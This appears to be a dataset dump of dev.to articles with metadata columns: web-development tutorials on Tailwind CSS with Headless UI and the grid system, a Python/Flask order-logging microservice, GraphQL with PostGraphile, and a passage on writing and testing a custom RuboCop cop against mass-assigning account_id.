id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,225,931 | How to use Tailwind CSS 3 with Headless UI In React | In this section we will install tailwind v3 headless ui react. Headless UI is a set of completely... | 0 | 2022-10-21T06:16:21 | https://larainfo.com/blogs/how-to-use-tailwind-css-3-with-headless-ui-in-react | react, tailwindcss, headlessui, webdev | In this section we will install tailwind v3 headless ui react. Headless UI is a set of completely unstyled, fully accessible UI components, designed to integrate beautifully with Tailwind CSS. it is also provide dropdown menu, lightbox, Switch (Toggle), Dialog (Modal), Popover, Radio Group, Transition, Tabs. So you can easily copy and paste code in you project.
### Tool Use
**Tailwind CSS 3.x**
**[Headless UI](https://headlessui.com/)**
**React JS**
### Install Tailwind CSS v3 In React
Create react project
```react
npx create-react-app react-headlessui
```
move to project folder & run.
```react
cd react-headlessui
npm start
```
Install tailwind v3.
```react
npm install -D tailwindcss postcss autoprefixer
```
Create tailwind config file.
```react
npx tailwindcss init
```
Next, you need to set tailwind config path.
_tailwind.config.js_
```react
module.exports = {
content: [
"./src/**/*.{js,jsx,ts,tsx}",
],
theme: {
extend: {},
},
plugins: [],
}
```
Add the @tailwind directives for each of Tailwind’s layers to your ./src/index.css file.
_index.css_
```css
@tailwind base;
@tailwind components;
@tailwind utilities;
```
_App.js_
```react
function App() {
return (
<div className="container mx-auto mt-4">
<h1 className="text-xl font-bold ">
Setup Tailwind CSS 3 with{' '}
<span className="text-transparent bg-clip-text bg-gradient-to-r from-green-400 via-blue-500 to-purple-600">
Headless UI In React
</span>
</h1>
</div>
);
}
export default App;
```

**Install headless ui**
To get started, install Headless UI via npm or yarn:
```react
# npm
npm install @headlessui/react
# Yarn
yarn add @headlessui/react
```
Now lets test headless ui toggle code.
_App.js_
```react
import { useState } from 'react'
import { Switch } from '@headlessui/react'
export default function App() {
const [enabled, setEnabled] = useState(false)
return (
<div className="container mx-auto mt-20">
<h1 className="text-xl font-bold ">
Tailwind Headless UI {' '}
<span className="text-transparent bg-clip-text bg-gradient-to-r from-green-400 via-blue-500 to-purple-600">
Switch (Toggle)
</span>
</h1>
<div className="ml-28">
<Switch
checked={enabled}
onChange={setEnabled}
className={`${enabled ? 'bg-teal-900' : 'bg-teal-700'}
relative inline-flex flex-shrink-0 h-[38px] w-[74px] border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus-visible:ring-2 focus-visible:ring-white focus-visible:ring-opacity-75`}
>
<span className="sr-only">Use setting</span>
<span
aria-hidden="true"
className={`${enabled ? 'translate-x-9' : 'translate-x-0'}
pointer-events-none inline-block h-[34px] w-[34px] rounded-full bg-white shadow-lg transform ring-0 transition ease-in-out duration-200`}
/>
</Switch>
</div>
</div>
)
}
```

run project via npm or yarn.
```react
# npm
npm start
# Yarn
yarn start
```
You can use more tailwind headless components in [doc](https://headlessui.com/).
[](https://www.buymeacoffee.com/same6)
### Read Also
👉 [Tailwind CSS Halloween Buttons Tutorial Example](https://larainfo.com/blogs/tailwind-css-halloween-buttons-tutorial-example)
👉 [Tailwind CSS List Style Marker Example](https://larainfo.com/blogs/tailwind-css-list-style-marker-example)
👉 [Create a Google Clone UI using Tailwind CSS](https://larainfo.com/blogs/create-a-google-clone-ui-using-tailwind-css)
👉 [Tailwind CSS Use Custom Fonts Example](https://larainfo.com/blogs/tailwind-css-use-custom-fonts-example)
👉 [Tailwind CSS Line Chart Example](https://larainfo.com/blogs/tailwind-css-line-chart-example)
👉 [Tailwind CSS Gradient Button Example](https://larainfo.com/blogs/tailwind-css-gradient-button-example)
👉 [Tailwind CSS Text Gradient Example](https://larainfo.com/blogs/tailwind-css-text-gradient-example)
👉 [Tailwind CSS Simple POST CRUD UI Example](https://larainfo.com/blogs/tailwind-css-simple-post-crud-ui-example)
👉 [Tailwind CSS Thank You Page Example](https://larainfo.com/blogs/tailwind-css-thank-you-page-example)
👉 [Tailwind CSS 3 Breadcrumb Example](https://larainfo.com/blogs/tailwind-css-3-breadcrumb-example)
👉 [Tailwind CSS 3D Button Example](https://larainfo.com/blogs/tailwind-css-3d-button-example)
👉 [How to Use Custom Colors in Tailwind CSS](https://larainfo.com/blogs/how-to-use-custom-colors-in-tailwind-css)
👉 [How to Use Strike Tag (cut text) in Tailwind CSS](https://larainfo.com/blogs/how-to-use-strike-tag-cut-text-in-tailwind-css)
👉 [Tailwind CSS Headings Typography Examples](https://larainfo.com/blogs/tailwind-css-headings-typography-examples)
👉 [Tailwind CSS Product List Example](https://larainfo.com/blogs/tailwind-css-product-list-example)
👉 [How to Center a Div in Tailwind CSS](https://larainfo.com/blogs/how-to-center-a-div-in-tailwind-css)
| saim_ansari |
1,225,937 | Microservices | Microservice software architecture is something opposite of monolithic architecture. For small... | 0 | 2022-10-21T06:30:04 | https://dev.to/jungle_sven/microservices-42o | microservices, python, programming, api | Microservice software architecture is something opposite of monolithic architecture. For small projects, monolithic architecture is the most straightforward way to think about its design in general. But any mature project cannot be developed and supported easily if it is a monolith.
The microservice pattern forces developers to divide the project not just into separate modules and classes but into individual tiny apps called microservices. They can be deployed in different data centers, supported by other teams, etc.

Now we will build a simple microservice for our trading software. It will receive our order data via API and save it to the local database. Of course, it is possible to save that data to a local disk. Still, suppose we want to build high-frequency trading software. In that case, we don't want to waste any local resources on logging or statistics, or maybe we want to outsource the development of a feature to a different developers team.
First of all, we will build a basic database connector. We will use the SQLite database for educational purposes. We will create a table of Orders containing six fields: timestamp, username, market, side, size, and price.
Example code:
```plaintext
class Database:
#this is a DB connector
#we will use SQLite in this example for simplicity
def init(self):
#filename and path to the database are hardcoded for simplicity
self.connect_to = 'test.db'
def create_table_orders(self):
#a func to create our database
conn = sqlite3.connect(self.connect_to)
conn.execute('''CREATE TABLE if not exists Orders
(timestamp TEXT NOT NULL,
username TEXT NOT NULL,
market TEXT NOT NULL,
side TEXT NOT NULL,
size FLOAT NOT NULL,
price FLOAT NOT NULL
);''')
conn.close()
```
Database connector will have only one method implemented to save order data to the database.
Example code:
```plaintext
def add_data_orders(self, timestamp, username, market, side, size, price):
#a func to save orders data
conn = sqlite3.connect(self.connect_to)
conn.execute("INSERT INTO Orders (timestamp, username, market, side, size, price) VALUES (?, ?, ?, ?, ?, ?)", (timestamp,
username, market, side, size, price));
conn.commit()
conn.close()
```
Second, we need an API server. Creating a simple API server with the Flask module in less than 30 lines of code is possible. It will be able to receive HTTP POST requests with order data and save it to the database.
Example code:
```plaintext
@app.post("/API/orders")
def save_orders():
if request.is_json:
response = request.get_json()
DB.add_data_orders(response['timestamp'], response['username'], response['market'], response['side'],
response['size'], response['price'])
return response, 201
return {"error": "Request must be JSON"}, 415
```
You can find complete database connector code and API SERVER code on GitHub.
And finally, we need an API connector for our service. Our API connector will use the requests library to make POST HTTP requests to our API server.
Example code:
```plaintext
def generate_request(self, order):
try:
response = requests.post(self.api_url, json=order)
print(response)
except Exception as e:
print('generate_request - Exception', e)
```
You can find the complete API CLIENT code on GitHub.

In ~100 lines of code, we created a database connector, API server, and API client to save order data to the database on the remote server.
The code is available in this [Github repo](https://github.com/Jungle-Sven/efficient_trading_software/blob/main/3_microservices_server.py). | jungle_sven |
1,226,180 | Tailwind CSS Grid System | Author: Abdullah Numan Introduction In this article we look at how to implement... | 0 | 2022-10-21T13:46:38 | https://refine.dev/blog/tailwind-grid/ | tailwindcss, react, webdev, css | **Author: <a target="_blank" href="https://refine.dev/blog/author/abdullah_numan/">Abdullah Numan</a>**
## Introduction
In this article we look at how to implement responsive layouts with CSS Grid using **TailwindCSS Grid** classes.
TailwindCSS, or just Tailwind, is a CSS framework used for rapidly building websites. It comes with a core set of already defined CSS utility classes that can be composed and easily custom configured afterwards to implement any design with respect to responsiveness, layout and themes.
It is possible to build multi column layouts using Tailwind with its Flexbox classes by dividing the width of the container with `w-{fraction}` classes. However, with versions 1.2 and above, we can build highly elaborate layouts with Tailwind's CSS Grid classes.
Steps we'll cover:
- [What is Tailwind Grid System](#what-is-tailwind-grid-system)
- [Basic Tailwind Grid Example](#basic-tailwind-grid-example)
- [Add Grid Formatting Context](#add-grid-formatting-context)
- [Column Numbers](#column-numbers)
- [Grid Gap](#grid-gap)
- [Responsive Column Numbers](#responsive-column-numbers)
- [Size and Placement](#size-and-placement)
- [Setting Size with Span](#setting-size-with-span)
- [Placement](#placement)
- [Grid Rows](#grid-rows)
- [Span Rows](#span-rows)
- [Reorder Regions](#reorder-regions)
- [Customizing TailwindCSS Theme](#customizing-tailwindcss-theme)
## What is Tailwind Grid System
Unlike Twitter's Bootstrap and Foundation, that still use flexbox to implement their 12 column layout under the hood, Tailwind uses CSS Grid to allow us build responsive and highly customizable layouts of any number of columns and rows. It ships with CSS classes that implement a CSS Grid container with names like `grid`, `grid-cols-{n}` and `grid-rows-{n}`, etc. It also comes with Grid child classes that helps us define grid behavior of child elements of the grid with classes like `col-span-{n}`, `row-span-{n}`, and so on.
Tailwind's default configuration allows a maximum of 12 columns on a screen. It can be customized from the `tailwind.config.js` file. Many other options related to Tailwind's CSS Grid classes can be altered according to our taste and needs. In this post, we are going to explore extending the number of columns to 16.
In this post, mostly, we will be playing with responsive application of **Tailwind Grid** classes that allow us to change layouts after a certain breakpoint, such as using `grid-cols-3 md:grid-cols-3`.
I recommend following the documentation for Grid classes starting from [this section](https://tailwindcss.com/docs/grid-template-columns) of TailwindCSS refrences and those that follow.
## Project Goals
We'll implement a simple layout having a navbar, a side content area, a main content area and a footer. It will consist of three columns and five rows.
We'll start from scratch with a set of `div`s that follow the Block Formatting Context or **BFC**, and then gradually cover the concepts related to **Grid Formatting Context** by introducing new classes according to our needs.
## Project Setup
Before we begin though, in order to get things ready, follow these steps:
1. Navigate to a folder of your choice and clone [this repo](https://github.com/anewman15/tailwindcss-grid)
2. Open the cloned repository. It is important that it has the Live Server added and enabled.
3. Install dependencies with ```npx tailwindcss -i ./src/styles.css -o ./dist/styles.css --watch```
4. Start Live Server and navigate to the port number. Or just click on the `Go Live` button at the bottom right corner of the your code editor:
## Basic Tailwind Grid Example
First, we have the following `index.html` document that is linked to the TailwindCSS styles in the `<head>`:
```html
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/dist/styles.css" rel="stylesheet">
<title>Document</title>
</head>
<body>
<div class="container m-auto">
<div class="tile bg-teal-500">
<h1 class="tile-marker">ONE</h1>
</div>
<div class="tile bg-amber-500">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500">
<h1 class="tile-marker">THREE</h1>
</div>
<div class="tile bg-lime-600">
<h1 class="tile-marker">FOUR</h1>
</div>
<div class="tile bg-green-600">
<h1 class="tile-marker">FIVE</h1>
</div>
<div class="tile bg-emerald-500">
<h1 class="tile-marker">SIX</h1>
</div>
<div class="tile bg-teal-500">
<h1 class="tile-marker">SEVEN</h1>
</div>
<div class="tile bg-purple-500">
<h1 class="tile-marker">EIGHT</h1>
</div>
<div class="tile bg-pink-500">
<h1 class="tile-marker">NINE</h1>
</div>
</div>
</body>
</html>
```
## Add Grid Formatting Context
If we introduce `grid` class to the container `div`, nothing happens:
```html
<div class="container m-auto grid">
```
That's because the default `grid` has only one column.
### Column Numbers
Let's add three explicit columns:
```html
<div class="container m-auto grid grid-cols-3">
```
Now, we have all the `div`s flowed into 3 columns according to Grid Formatting Context:

Notice that `grid-cols-3` just divides the screen into 3 equal parts of each `1fr` as with: `grid-template-columns: repeat(3, minmax(0, 1fr));`.
### Grid Gap
Let's add some gap with `gap-{size}` class. We have to set it to the grid container:
```html
<div class="container m-auto grid grid-cols-3 gap-4">
```
Now we have a gap between the children `div`s:

### Responsive Column Numbers
We can add columns at larger breakpoints:
```html
<div class="container m-auto grid grid-cols-3 md:grid-cols-5 lg:grid-cols-8 gap-4">
```
Here, we're using Tailwind's default breakpoints at `md: 768px` and `lg: 1024px`. We can see the number of columns increasing at `768px` and `1024px`:

It's important to notice that Tailwind's responsive classes such as `md` and `lg` do not represent screensizes, but rather mobile-first breakpoints. So `grid-cols-3` lays out 3 columns for all screen sizes, but since column numbers change after `md` we get 5 columns **after** that screen size. And because it changes again after `lg` we get 8. It doesn't change afterwards, so we continue getting 8 columns even in `xl`, `2xl` screen sizes.
## Size and Placement
**Tailwind's CSS Grid** sizing and placing classes gives us more control over how many columns a section should span and where we want to start and end it.
### Setting Size with Span
Below, we place the first `div` as a navbar. We are doing this with `col-span-{n}` for each screen size. We have to make sure it starts at the beginning of the grid and spans the entire screen at each screen size:
```html
<div class="tile bg-teal-500 col-span-3 md:col-span-5 lg:col-span-8">
<h1 class="tile-marker">ONE</h1>
</div>
```

We can refactor the above `div` as:
```html
<div class="tile bg-teal-500 col-span-full">
<h1 class="tile-marker">ONE</h1>
</div>
```
We can also use `col-start-{n}` and `col-end-{n}` to achieve this:
```html
<div class="tile bg-teal-500 col-start-1 col-end-4 md:col-start-1 md:col-end-6 lg:col-start-1 lg:col-end-9">
<h1 class="tile-marker">ONE</h1>
</div>
```
But look at the double responsive classes for at each breakpoint for each of start and end:
```html
md:col-start-1 md:col-end-6 lg:col-start-1 lg:col-end-9
```
They are not very DRY. `col-span-{n}` classes are better for setting the size.
Let's set some more sizes. The width of the second and third `div`s like so:
```html
<div class="tile bg-amber-500 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
```
### Placement
`col-span-{n}` classes provide limited freedom to place `div`s inside the grid container, whereas `col-start-{n}` and `col-end-{n}` leads to a lot of repetition when repsonsive classes are used.
We can combine start classes with span classes to write more succint code. Start classes can be used to **place** a `div` and span classes can be used to define its width and height.
Let's see an instance of it with the fourth `div`:
```html
<div class="tile bg-lime-600 lg:col-start-4 lg:col-span-2">
<h1 class="tile-marker">FOUR</h1>
</div>
```

As we can see, at `lg` and onward the fourth `div` starts at column four and spans two columns to the right.
OK.
Now if we look closely at the layout, we see that everything is haphazard and it is still not a well set and usable grid to work with - as the last two `div`s seem to be isolated from the rest. This is because, we have applied the half of the equation: only Grid **column** classes. The other half involves the Grid **rows**.
---
## Is your CRUD app overloaded with technical debt?
Meet the headless, React-based solution to build sleek **CRUD** applications. With refine, you can be confident that your codebase will always stay clean and boilerplate-free.
Try [refine](https://github.com/pankod/refine) to rapidly build your next **CRUD** project, whether it's an admin panel, dashboard, internal tool or storefront.
<div>
<a href="https://github.com/pankod/refine">
<img src="https://refine.dev/img/generic_banner.png" alt="refine blog logo" />
</a>
</div>
<br/>
## Grid Rows
If we want to have finer control over the Grid, we need to explicitly set the number of rows, just like we have the columns. We'll do this by introducing `grid-rows-{n}`.
For our grid, we want 5 rows. The number of rows has been defined implicitly so far, but we want to define it explicitly this time. So, we add `grid-rows-5` to our container:
```html
<div class="container m-auto grid grid-cols-3 grid-rows-5 md:grid-cols-5 lg:grid-cols-8 gap-4">
```
Now, we can go ahead and set the last `div` to become a footer. This footer will be placed to the bottom row. To the left side on smaller screens but span the entire bottom row after `md`:
```html
<div class="tile bg-pink-500 row-start-5 md:col-span-full">
<h1 class="tile-marker">NINE</h1>
</div>
```
Here, `row-start-5` tells the footer to be placed to the bottom row. It looks like this:

### Span Rows
We can go further and make it more structured. Let's make the second `div` span the left side of the grid - between the navbar and the footer. We can do this by choosing the second row as the starting point of the `div` and ending at 5:
```html
<div class="tile bg-amber-500 row-start-2 row-end-5 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
```
We have it shaping into a better website layout:

## Reorder Regions
We can change the order of a region by altering the the value of `n` in `row-start-{n}` and `col-start-{n}`. The second `div` could be an ad section which we want to display at the bottom on smaller screens and at the top on larger screens. Let's set its order at smaller screens first and then change it at `md`:
```html
<div class="tile bg-yellow-500 row-start-4 row-end-5 md:row-start-2 md:row-end-3 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
```
We have something looking like this:

And the final `index.html` looks like this:
```html
<!-- index.html -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/dist/styles.css" rel="stylesheet">
<title>Document</title>
</head>
<body>
<div class="container m-auto grid grid-cols-3 grid-rows-5 md:grid-cols-5 lg:grid-cols-8 gap-4">
<div class="tile bg-teal-500 col-span-full">
<h1 class="tile-marker">ONE</h1>
</div>
<div class="tile bg-amber-500 row-start-2 row-end-5 col-span-1 md:col-span-2 lg:col-span-3">
<h1 class="tile-marker">TWO</h1>
</div>
<div class="tile bg-yellow-500 row-start-4 row-end-5 md:row-start-2 md:row-end-3 col-span-2 md:col-span-3 lg:col-span-5">
<h1 class="tile-marker">THREE</h1>
</div>
<div class="tile bg-lime-600 lg:col-start-4 lg:col-span-2">
<h1 class="tile-marker">FOUR</h1>
</div>
<div class="tile bg-green-600">
<h1 class="tile-marker">FIVE</h1>
</div>
<div class="tile bg-emerald-500">
<h1 class="tile-marker">SIX</h1>
</div>
<div class="tile bg-teal-500">
<h1 class="tile-marker">SEVEN</h1>
</div>
<div class="tile bg-purple-500">
<h1 class="tile-marker">EIGHT</h1>
</div>
<div class="tile bg-pink-500 row-start-5 md:col-span-full">
<h1 class="tile-marker">NINE</h1>
</div>
</div>
</body>
</html>
```
<br/>
<div>
<a href="https://discord.gg/refine">
<img src="https://refine.dev/img/discord_big_blue.png" alt="discord banner" />
</a>
</div>
## Customizing TailwindCSS Theme
As mentioned above, **TailwindCSS Grid** configuration can be changed according to our needs.
Let's say for some reason we want to set the maximum number of Tailwind's grid columns to be 16. This means we will need to be able to generate all the `grid-cols-{n}` classes starting from `n` 0 to 16. This also means we will need to generate all the `col-start-{n}` and `col-end-{n}` classes.
We can generate these classes by extending the related properties in the `tailwind.config.js` file. For our purposes, the `gridTemplateColumns`, `gridColumnStart` and `gridColumnEnd` properties:
```ts
// tailwin.config.js
module.exports = {
theme: {
extend: {
gridTemplateColumns: {
// Simple 16 column grid
'16': 'repeat(16, minmax(0, 1fr))',
},
gridColumnStart: {
'13': '13',
'14': '14',
'15': '15',
'16': '16',
'17': '17',
},
gridColumnEnd: {
'13': '13',
'14': '14',
'15': '15',
'16': '16',
'17': '17',
}
}
}
}
```
This will make all the relevant grid classes available for us to use.
## Conclusion
In this article, we built a simple responsive layout using **Tailwind's CSS Grid** classes. These classes allow us to set the number of columns and rows explicitly, and help us make the layout responsive by allowing us to reset them at larger breakpoints.
We can also easily alter the size and placement of a given section with **Tailwind Grid**. Reordering of sections at different breakpoints are also commonly done. And perhaps more conveniently, Tailwind allows us to customize many of the properties for generating classes we need so that we can build fluid and responsive layouts according to our individual needs. | necatiozmen |
1,226,379 | GraphQL API Integration for Full-Stack Apps with PostGraphile | In part two of this tutorial series, we’re going to look at the key features of GraphQL and how to... | 0 | 2022-10-24T14:20:01 | https://dev.to/adambiggs/graphql-api-integration-for-full-stack-apps-with-postgraphile-5701 | graphql, api, backend, postgraphile | In part two of this tutorial series, we’re going to look at the key features of GraphQL and how to integrate it with PostGraphile to enhance the back-end of our full-stack application.
In part one, we covered how to approach building a GraphQL API with TypeScript and Node.js as well as the key benefits of this architecture. If you missed it, check out how we set up the project and bootstrapped our code by installing dependencies and configuring our data model.
## What is GraphQL?
In a nutshell, GraphQL acts as a layer to fetch and mutate data. It’s language-agnostic on both the front and back-end (e.g. JavaScript, Java, C#, Go, PHP, etc.) and serves as a bridge between client and server communications.

The goal of GraphQL is to provide methods for retrieving and modifying data. To provide this function, GraphQL has several operations:
- **Queries**: for performing data fetching operations on the server.
- **Mutations**: analogue to the standard CRUD (Create, Retrieve, Update, Delete) operations, except for the Retrieve (for which Queries are responsible in GraphQL).
- **Subscriptions**: conceptually, subscriptions are like Queries in that it’s utilized to fetch data. It may maintain an active connection to your GraphQL server to enable the server to push live updates for the subscribed clients.
- **Resolvers**: Resolvers are implemented in the back-end as handlers for the lookup logic for the requested resources.
It’s important to mention that GraphQL isn’t a framework/library, nor a database implementation/query language for the DB. Rather, it’s a specification powered by a robust type system called Schema Definition Language (GraphQL SDL) described in its specs. It serves as a mechanism to enforce a well-defined schema that serves like a contract establishing what is and what isn’t allowed.
It’s a wrong assumption to think that GraphQL is a database implementation or a query language tied to any particular database. Although it’s common to see that being translated to DB interactions, it’s possible to use GraphQL even without having any sort of DB (ex., you can set up a GraphQL layer to expose and orchestrate different REST APIs endpoints).
## Using PostGraphile to Integrate with GraphQL
There are a few ways to set up a GraphQL API in Node.js. These options may include:
- Apollo Server
- Hasura
- Prisma
- PostGraphile
Alternatively, you can build your own server with custom resolvers and a schema definition. While there are pros and cons for each method, we’ll use PostGraphile in this tutorial. We’ve made that choice because it provides an instant GraphQL API based on the DB schema.
## What Is PostGraphile?
PostGraphile is a powerful tool that makes it easy to set up a robust GraphQL API relatively quickly. According to the official documentation:
_“PostGraphile automatically detects tables, columns, indexes, relationships, views, types, functions, comments, and more — providing a GraphQL server that is highly intelligent about your data, and that automatically updates itself without restarting when you modify your database.”_
This makes PostGraphile a great option for developers because it enables them to build fast, reliable APIs. Some of the key features that make this possible are:
- Strong PostgreSQL support
- Use of GraphQL best practices
- Simplicity to deploy and scale
- Customizability
- Impressively high performance
- Granular authorisation via RLS
- Open source under MIT license
- Powerful plugin system
## Configuring PostGraphile
There are two ways of integrating PostGraphile into our project: via **PostGraphile CLI** or through a middleware. For this project, we’ll use a middleware.
Now that we have an overview of GraphQL and how **PostGraphile** can be helpful in our demo project, let’s go ahead and install the **PostGraphile** dependency in our project.
```
npm install postgraphile@^4.12.9
```
To use PostGraphile in our application, we need to import it like our other dependencies. The import can be added to the top of the App.ts file:
```
import postgraphile from 'postgraphile'
```
After that, all we need to do to complete the setup is to enhance our App.ts and bootstrap our Express server with PostGraphile Middleware. To do that, replace this code section:
```
/**
* This is our main entry point of our Express server.
* All the routes in our API are going to be here.
**/
const App = () => {
const app = express()
app.use(express.json())
```
With this:
```
const pgUser = '*** INSERT YOUR POSTGRESQL USER HERE ***'
/**
* This is our main entry point of our Express server.
* All the routes in our API are going to be here.
**/
const App = () => {
const app = express()
app.use(express.json())
app.use(postgraphile(`postgresql://${pgUser}@localhost/catalog_db`, 'public', {
watchPg: true,
graphiql: true,
enhanceGraphiql: true,
}))
```
We’re basically configuring the **PostGraphile** middleware in our server.
Now, if you restart the server and hit the http://localhost:8090/graphiql in your browser, you’re going to see some really interesting stuff! We’ll dig into all of that in the next section.
Note: if, when restarting the server, you see:
- _“Failed to setup watch fixtures in Postgres database”_
- _“A serious error occurred when building the initial schema. Exiting because `retryOnInitFail` is not set”_
_Then make sure the user specified in the **const pgUser =** is valid and that you have the admin privileges for changing the Postgres DB Schema._
## GraphQL Playground
GraphQL Playground is a sort of IDE for exploring and interacting with a GraphQL server. It comes with an interactive UI that can run on the browser to where you can build and test queries/mutations and explore the GraphQL schemas.
What you are seeing is an enhanced version of GraphiQL shipped with PostGraphile. While it’s out of the scope of this tutorial to dive deep into the GraphQL playground, we’ll cover some of the key features that it provides.
## GraphQL API Documentation
Our GraphQL Playground can also serve as an API documentation with the powerful schema introspection feature. Let’s take a look.
First, in the top right-corner, click on the **“< Docs”** option. This will open the **Documentation Explorer**:

There are two root types enabled: **Query** and **Mutation**. Let’s explore the **Query** type.
If you scroll down, you’ll see many options available to use. In TypeORM, we defined the entities to be added to the PostgreSQL server. The PostGraphile middleware is able to automatically expose these entities to GraphQL, allowing us to access them through GraphiQL.
Let’s take a look at the **allCategories** query as an example:

By clicking on the **allCategories** hyperlink, you can see the details of that query:

This window displays the different methods you can use to work with the query results.
Notice that GraphQLsupports Cursor (after, before) and Offset (first/last, offset) based pagination, Ordering and Filters (condition), with all of that supported out of the box!
As for the **Mutation** type, you have access to create, update and delete utilities for all of our entities!
In the following sections, we’ll explore some of the fundamental features of a GraphQL API: writing Queries and Mutations.
_Note: this article is not going to cover all the details of writing **Queries** and **Mutations**. If you’re interested in this, there are some great resources on the official GraphQL Foundation website._
Want to learn more? I would highly recommend this article: [GraphQL API Integration for Full-Stack Apps with PostGraphile [Tutorial Part 2]](https://www.scalablepath.com/full-stack/graphql-and-postgraphile-integration-full-stack-tutorial-part-2) | adambiggs |
1,226,403 | Writing and testing a custom RuboCop cop | Solving a problem is great — but keeping it from coming back is even better. As we resolve issues in... | 0 | 2022-10-21T17:36:44 | https://dev.to/aha/writing-and-testing-a-custom-rubocop-cop-32bc | rails, ruby, rubocop | Solving a problem is great — but keeping it from coming back is even better. As we resolve issues in our code base, we often consider how to keep that classification of issue out of the code base entirely. Sometimes we reach for [RuboCop](https://docs.rubocop.org/rubocop/index.html) to help us police certain patterns. This also helps to document the originating issue and educates teammates on why these patterns are undesirable.
RuboCop is more than just a linter. It is highly extensible and allows you to write [custom cops](https://thoughtbot.com/blog/rubocop-custom-cops-for-custom-needs) to enforce specific behavior. These cops can be used to create better code practices, prevent bad patterns from sneaking into a legacy code base, and provide training for other engineers. But it can be tricky to know [how to create a new cop](https://docs.rubocop.org/rubocop/development.html) and if it will work long-term.
> We can write unit tests to ensure the success of our custom cops, just as we would with any application code.
Let's explore this with an example to show how testing could be done.
## Testing custom cops
With the Aha! engineering team, every model has an `account_id` attribute present and for [security reasons][security], we never want this to be set via mass-assignment. To avoid this, we want to prevent certain attributes from being added to [attr_accessible][attr_accessible].
[attr_accessible]: https://apidock.com/rails/ActiveRecord/Base/attr_accessible/class
[security]: https://brakemanscanner.org/docs/warning_types/mass_assignment/
```ruby
# bad
class Foo
attr_accessible :name, :account_id
end
Foo.create(account_id: 1, name: "foo")
# good
class Foo
attr_accessible :name
end
foo = Foo.new(name: "foo")
foo.account_id = 1
foo.save
```
We have a custom cop that analyzes the arguments to that method and will error if any protected attribute is present. The custom cop we have ends up looking something like this:
```ruby
class RuboCop::Cop::ProtectedAttrAccessibleFields < RuboCop::Cop::Cop
# We can define a list of attributes we want to protect
PROTECTED_ATTRIBUTES = [
:account_id,
].freeze
# We can define an error message that is displayed when an offense is detected.
# This can be helpful to communicate information back to other engineers
ERROR_MESSAGE = <<~ERROR.freeze
Only permit attributes that are safe to be completely user controlled. Typically any *_id field could be problematic.
Instead perform direct assignment of the field after doing a scoped lookup. This is the safest way to handle user input.
Some fields such as #{PROTECTED_ATTRIBUTES.inspect} should never be used as part of attr_accessible.
ERROR
# We want to examine method calls. Particularly those that are calling the attr_accessible method
# and also have arguments we care about
def on_send(node)
if receiver_attr_accessible?(node) && protected_arguments?(node)
# If we do detect an attr_accessible call with arguments we care about, we can record an offense
add_offense(node, message: ERROR_MESSAGE)
end
end
private
def receiver_attr_accessible?(node)
node.method_name == :attr_accessible
end
def protected_arguments?(node)
node.arguments.any? do |argument|
if argument.sym_type? || argument.str_type?
PROTECTED_ATTRIBUTES.include?(argument.value.to_sym)
end
end
end
end
```
This custom cop does the trick. Adding a test for it ensures that it won't break in the future when we update RuboCop or extend the functionality. In order to write a test, we need to understand how the custom cops are set up and run.
## Instantiate a custom cop
`RuboCop::Cop::Cop` inherits from `RuboCop::Cop::Base` and that allows the instantiation without [any arguments](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/base.rb#L71). So it turns out this isn't anything special — creating a new instance of our cop is really as simple as: `RuboCop::Cop::ProtectedAttrAccessibleFields.new`
If the cop requires some kind of configuration, it can be passed to the instance via a `RuboCop::Config` object. The `RuboCop::Config` takes two arguments. RuboCop can [provide configuration](https://docs.rubocop.org/rubocop/configuration.html) via YML files. You can use the first argument of `RuboCop::Config` to pass this configuration with various values from the test. The second argument is the path of the loaded YML file, which can be ignored in the tests.
```ruby
config = RuboCop::Config.new({ RuboCop::Cop::ProtectedAttrAccessibleFields.badge.to_s => {} }, "/")
cop = RuboCop::Cop::ProtectedAttrAccessibleFields.new(config)
```
## Process, execute, examine
As it turns out, there is a [method](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/base.rb#L238) available, `RuboCop::Cop::Base#parse` , that accepts a string as input and will return something the cop can process.
This allows us to have something like:
```ruby
source = <<~CODE
attr_accessible :account_id
CODE
processed_source = cop.parse(source)
```
There is a class from within RuboCop, `RuboCop::Cop::Commissioner` , that is responsible for taking a [list of cops](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L44) and using those to [investigate](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L79) the processed source code. In order to run our cop, we can run this method.
```ruby
commissioner = RuboCop::Cop::Commissioner.new([cop])
investigation_report = commissioner.investigate(processed_source)
```
The `RuboCop::Cop::Commissioner#investigate` method will return an instance of [RuboCop::Cop::Commissioner::InvestigationReport](https://github.com/rubocop/rubocop/blob/d8c2cd0d891c9e49f528041d3b0758a6fa480265/lib/rubocop/cop/commissioner.rb#L18) which is a simple struct class that has a list of offenses that have been recorded.
## Put it all together
We end up with a test file that looks something like this:
```ruby
describe RuboCop::Cop::ProtectedAttrAccessibleFields do
let(:config) { RuboCop::Config.new({ described_class.badge.to_s => {} }, "/") }
let(:cop) { described_class.new(config) }
let(:commissioner) { RuboCop::Cop::Commissioner.new([cop]) }
